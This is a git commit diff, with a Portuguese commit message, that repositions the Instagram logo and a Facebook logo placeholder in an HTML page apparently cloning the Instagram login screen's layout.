Ajuste de logo do facebook e da imagem do instagram

--- a/index.html
+++ b/index.html
@@ -28,17 +28,19 @@
 
 
     <div class="container">
-
+        
+        <i class="instagramm" data-visualcompletion="css-img" aria-label="Instagram" class="" role="img"
+            style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yS/r/ajlEU-wEDyo.png&quot;); background-position: 0px -52px; background-size: auto; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"></i>
         <img src="">
         <input placeholder="Telefone,nome de usuário ou email" type="text" class="telefone">
         <input placeholder="Senha" type="password">
 
         <button>Entrar</button>
         <a class="OU">________________ OU ________________</a>
+        <div class="face-logo"> </div>
         <a class="facebook">Entrar com Facebook</a>
         <a class="esqueceu-senha">Esqueceu a senha ?</a>
-        <i class="instagramm" data-visualcompletion="css-img" aria-label="Instagram" class="" role="img"
-            style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yS/r/ajlEU-wEDyo.png&quot;); background-position: 0px -52px; background-size: auto; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"></i>
+
 
 
 
@@ -63,11 +65,7 @@
 
 
 
-    <div class="face-logo">
-
-
-
-    </div>
+    
 
 
     </div>
